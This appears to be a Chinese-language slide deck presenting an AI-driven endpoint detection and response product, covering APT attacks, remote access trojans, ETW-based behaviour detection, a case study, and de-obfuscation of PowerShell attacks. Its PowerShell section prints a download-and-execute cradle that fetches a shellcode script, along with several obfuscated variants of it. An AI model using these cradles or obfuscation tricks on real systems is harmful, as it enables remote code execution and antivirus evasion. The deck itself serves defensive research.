1、以系统大数据驱动，基于人工智能的端点安全目录1.APT背景和当前的检测技术2.我们的解决方案3.实战分析4.POWERSHELL的检测目录目录1.APT背景和当前的检测技术1.1增长中的APT攻击1.2 APT 给信息安全解决方案带来革命性变化1.3 现有检测方法的对比目录 随着网络攻防战的升级，攻击手段逐步从简单的手段，发展到复杂的以APT为代表的立体攻击。APT攻击综合利用各种技术进行渗透，针对政府、关键机构、公司窃取重要信息或者造成重大破坏。这种攻击方式使得传统的防御体系难以侦测。据权威的情报中心统计，中国已成为全球APT攻击第一目标国！破坏，窃取或者绑架核心数字信息资产已经为集团化黑客

2、行为的最终目标1.1 增长中的APT攻击77%的企业IT高管认为有效的抵御APT（高级持续威胁）的解决方案是他们急需或者是非常关键的投资需求70%90%的恶意软件攻击是专门针对企业去设计并且具有很强的自我混淆防护功能232天-企业平均需要的时间去侦测或者发现APT所引起的安全事件。这对企业的信息安全有非常大的破坏。如何缩短针对APT 入侵的侦测时间和实时阻断是IT高管最重要的需求。24%对于PC终端的攻击是FILE-LESS的，这使传统的基于文件特征对比的防病毒软件形同虚设。1.2 APT 给信息安全解决方案带来革命性变化以APT为代表攻击的隐蔽和复杂性日益提高（使用0-DAY漏洞和无文件攻击

3、等），黑客有各种方式来绕过现有的防护方案。对基于网络流量的分析的下一代防火墙，对流量进行加密绕过；对静态特征检测的防病毒软件，对恶意软件进行混淆绕过；动态沙箱检测无法在客户端部署，且会对沙箱进行反侦测以绕过；HOOKING 修改操作系统内核，会影响其稳定性、且新的操作系统如WIN10已禁止此类行为.1.3 现有检测方法的对比传统防御手段不足以应对以APT为代表的新型攻击。EDR已成国际安全热点，产生独角兽如市值200亿美元的CROWD STRIKE,CARBON BLACK 等1.3 现有检测方法的对比响应时间精确度(抗逃逸,覆盖率)高基于日志文件的分析杀毒软件防火墙沙箱基于行为分析的EDR低

4、快慢目录2.我们的检测方案2.1 APT攻击的四个阶段&常用手段2.2 RAT背景介绍2.3 系统部署2.4 核心技术2.5 系统设计目录受害者攻击者恶意网页攻击浏览器钓鱼邮件漏洞利用源代码仓库数据库系统初步入侵（在目标系统内）立足持续侦查高价值信息/目标获取恶意软件细粒度动态行为识别态势感知，溯源分析2.1 APT攻击的四个阶段技术/工具APT攻击Spearphishing LinkAPT28,APT29,APT32,APT33,APT39Spearphishing EmailAPT12,APT19,APT28,APT29,APT32,APT37,APT39Poison Ivy RATRSA

5、 SecurID attack,Nitro attacksDarkcomet RATSyrian ConflictXtreme RATAPT Attacks on US,UK,Israel and other Middle East government阅读300+APT攻击白皮书1，我们发现社工以及RAT是APT攻击的常用手段1https:/ APT攻击常用手段Remote Access Trojan(RAT)是一种特殊的木马，它允许攻击者远程操控受害者的机器。RATs通常内置有数十种（10-40）潜在威胁功能(PHFs)，比如记录键盘、截屏、录音等。据统计，RAT相关的攻击可以潜伏在企业长

6、达3个月不被发现。大约90%的RAT只能运行在Windows平台上。112.2 RAT背景介绍奇盾奇盾EDREDR整体架构及挑战整体架构及挑战真正的EDR:部署于各种终端的轻量智能代理对操作系统底层的全局监控+基于AI的强大动态威胁检测机制（大数据智能和行为模式匹配作用于整个威胁生命周期）挑战巨大：海量数据（每秒百万级事件）低性能消耗 对不同端点支持，高稳定性，CEO&创始人 陈焰 教授陈焰 教授浙江大学91级混合班/计算机系本科。团队中另外还包括五名浙大混合班校友2003年获美国加州大学伯克利分校计算机博士学位。后加入美国西北大学计算机系，直至终身教授。2011年创办 NetShield 公

7、司，为华为，NEC，Motorola等公司成功承接多次高科技软件设计及实现原型外包，其技术已用于华为高端防火墙等产品中。2012年被浙大引进为特聘教授，创立浙大-美西北大学互联网安全联合实验室在国际信息安全顶级会议和期刊上发表百余篇论文，Google Scholar统计的论文总引用超过万次，拥有多项美国和中国专利。2016年被评为国际电气电子工程协会会士(IEEE Fellow)。20+年安全经验，原型在实验室已打磨四年，有多项国际领先技术 去年开始产品化顶尖技术来自世界一流团顶尖技术来自世界一流团队队EDR/CWPPEDR/CWPP系系统部署统部署-数据采集器（Collector)灵活支持各

8、种操作系统轻量系统开销:CPU 2%(based on Intel i5 processor testing)Memory 100MBHDD 100MB带宽8KB-检测取证引擎（Detector)支持各种内网和云端部署方式-按照EDR端点收费模式2.4 核心技术基于上下文的、语义化的检测与追溯系统 通过系统底层监控以检测恶意行为及其语义（检测点）。设计实现了国际首款从操作系统内置的监控工具（如ETW for Windows）收集并高效解析call stack等底层行为数据，比windows原生的工具快数倍。推断出如keylogging等的恶意行为语义，检测注入攻击和无文件攻击 且系统的开销低到

9、可以忽略 首创通过数据流和控制流实时重建整个攻击链 大大提高检测精度并可实时阻断 对混淆过的PowerShell攻击进行检测。混淆过的powershell恶意程序可以轻松绕过所有VirusTotal上厂商的检测 我们提出了一种轻量级的去混淆方案可实时高效检测2.5 系统设计如何设计检测点：.APT 攻击检测策略1.远程访问受害者机器（包括恶意软件的下载或者使用VNC等）2.执行可疑的行为，达到攻击的目标3.网络连接（窃取数据或者与控制端通信）.另外，还有其它一些的特性，例如隐蔽性地运行From MITRE Attack Matrix for Enterprise 2.5 系统设计 检测点2.5

10、 系统设计-检测点第一个通过Windows系统底层数据（ETW）还原keylogging等细粒度语义2.5 系统设计 检测点的实现202.5 系统设计 检测点训练系统架构Event Tracing for Windows(ETW)ETW 是Windows系统上自带的一个日志收集框架。它能在不修改内核的情况下，提供丰富的底层日志数据（比如System Call和Call-stack）。ETW包括2个模块，Recorder和Parser，原生Parser的问题解析速度慢。由于日志源源不断地产生，解析速度慢会导致数据溢出缓存，导致数据丢失。数据质量低。原始的ETW数据缺乏语义信息，如Syscall的

11、进程号解析错误，Syscall和Call-stack没有解析成符号表。我们的改进提出了一种快速解析算法，通过预先缓存好的offset直接对指定数据块解析，免去对冗余数据处理的时间。比windows原生的工具快数倍通过关联外部数据，修复原有ETW数据中的质量问题。212.5 系统设计 基于ETW的数据收集器基于Sysall/API构建序列/图模型来描述特定语义行为222.5 系统设计 现有方法ETW的数据缺陷问题导致了语义冲突 问题。语义冲突 指的是行为模型具有歧义性。同一个模型能够表示为两种完全不同的行为。232.5 系统设计 现有方法的局限：语义冲突问题核心观察：在Syscall层面上区分不

12、了的两个行为，可以在Call-stack层看到明显区别。关于Call-stack的三个特点:同一个高层API触发的多个Syscall，能够根据call-stack自动聚合成一棵树结构。同一个高层API的不同聚合树表示这个API接收了不同的输入（如参数）一个API接收不同的输入，可能会产生不同的聚合树。242.5 系统设计 新模型AATR 我们的系统能否准确地检测到未知恶意代码的细粒度语义行为？我们部署的系统是否会对用户的正常使用造成影响？我们设计了多个不同的实验来回答以上问题252.5 系统设计 实验 我们通过搜索黑客论坛，开源代码，公开售卖RAT的网站，一共收集了52个RAT家族的样本。大多

13、数都是非常臭名昭著的，如Poison Ivy，DarkcometRAT，Xtreme262.5 系统设计 测试数据集 52个RAT家族在时间上的分布272.5 系统设计 数据集在时间上的分布282.5 系统设计 不同病毒家族的细粒度行为292.5 系统设计 识别新出未知病毒的语义行为 我们的系统对各类主流应用造成 10%的运行时负载。测试机器环境为3.3 GHz Intel i5-4590 CPU and 4 GB 内存。302.5 系统设计 负载实验目录3.实战分析3.1 实战数据3.2 提取攻击图目录3.1 实战数据 总结35,650,758 个系统调用 system call event

14、s;529 个进程30个正常程序)20分钟处理时间;吞吐率:1,782,538 records/min 记录/分钟报出3个可疑进程Profile.exe 做了2次远程shell 行为Prodata.exe做了截屏的行为 根据上述3个进程做溯源成功地确定了所有22个涉及攻击的进程3.2 提取攻击图3.2 提取攻击图目录4.POWERSHELL检测4.1 POWERSHELL用于攻击的优势4.2 POWERSHELL混淆技术4.3 我们的解混淆+检测方案4.4 实验结果目录4.1 POWERSHELL用于攻击的优势2.PowerShell 用于”Live-off-the-Land Attack”和

15、“Fileless Attack”1.PowerShell 预装在大多数 Windows 电脑上（包括Desktop 和 Server），有很大的装机量。2.利用 PowerShell 可以很方便的调用 Windows 功能，实现如持久化，信息窃取等等恶意行为。3.PowerShell 可以直接从内存中执行，避免了文件操作。4.4.1 POWERSHELL混淆技术IEX(New-Object Net.WebClient).DownloadString(hxxps:/./Invoke-Shellcode.ps1)IeX(nEw-obJEct neT.wEbclIEnt).dOwnLOAdsTri

16、ng(hxxps:/./Invoke-Shellcode.ps1)OriginalRandomizeStringManipulation.(10-feX,I)(.(012-fnE,w-obJ,Ect)(3021-f Eb,IEnt,cl,neT.w).DO(3012-fOAds,Trin,g,wnL)(hxxps:/./Invoke-Shellcode.ps1)Encoding(rUNTiME.INterOpSERvIces.mArsHAl:ptrtOsTRinganSI(rUNTIme.InteROpSErvicES.MaRShAL:secUReSTRINgTOGLobALAllOCaNsI

17、($(.=|CoNVerTTo-seCuReStrInG-k(217.202)|&($VERBoSEpREFErENcE.tOstriNg()1,3+X-JoiN)4.1 POWERSHELL混淆技术1.混淆可以绕过大多数的检测引擎。2.基于混淆的检测会带来大量的误报。VirusTotal一共有“56”个杀毒引擎实验数据：Benign：从GitHub热度前500的PowerShell Repo中下载的 2342 样本Malicious：从热门的PowerShell攻击框架（PowerSploit，.）和安全博客上找到的 4098 个样本4.1 POWERSHELL混淆技术0.4%75.0%2.

18、6%90.0%经过我们的解混淆，杀毒引擎效果大幅度提升4.2 我们的解混淆+检测方案不同的使用场景：1.实时检测：高效，易于部署2.辅助人工分析：语义丰富，易于理解3.大规模自动化分析4.2 我们的解混淆+检测方案POWERSHELL检测结果0.4%75.0%2.6%90.0%经过我们的解混淆，杀毒引擎效果大幅度提升4.3 实验结果解混淆一个几KB的文件平均需要不到一秒钟。4.3 在原始脚本上提取到的特征总结安石（Cornerstone）端点检测响应系统(EDR)专注在成功入侵之后的攻击行为动态监测内核数据,抗逃逸检测底层恶意行为:下载并执行，远程shell,远程桌面，截屏，录音，记录键盘输入，访问敏感文件等.基于对APT研究的300+份白皮书的分析给出整个攻击链的起源分析和溯源分析基于控制流和数据流抗混淆的powershell 检测成功地在顶级靶场经历5次攻防演练THANKS4.3 实验结果4.3 解混淆脚本和原始脚本的相似度4.3 解混淆的相似度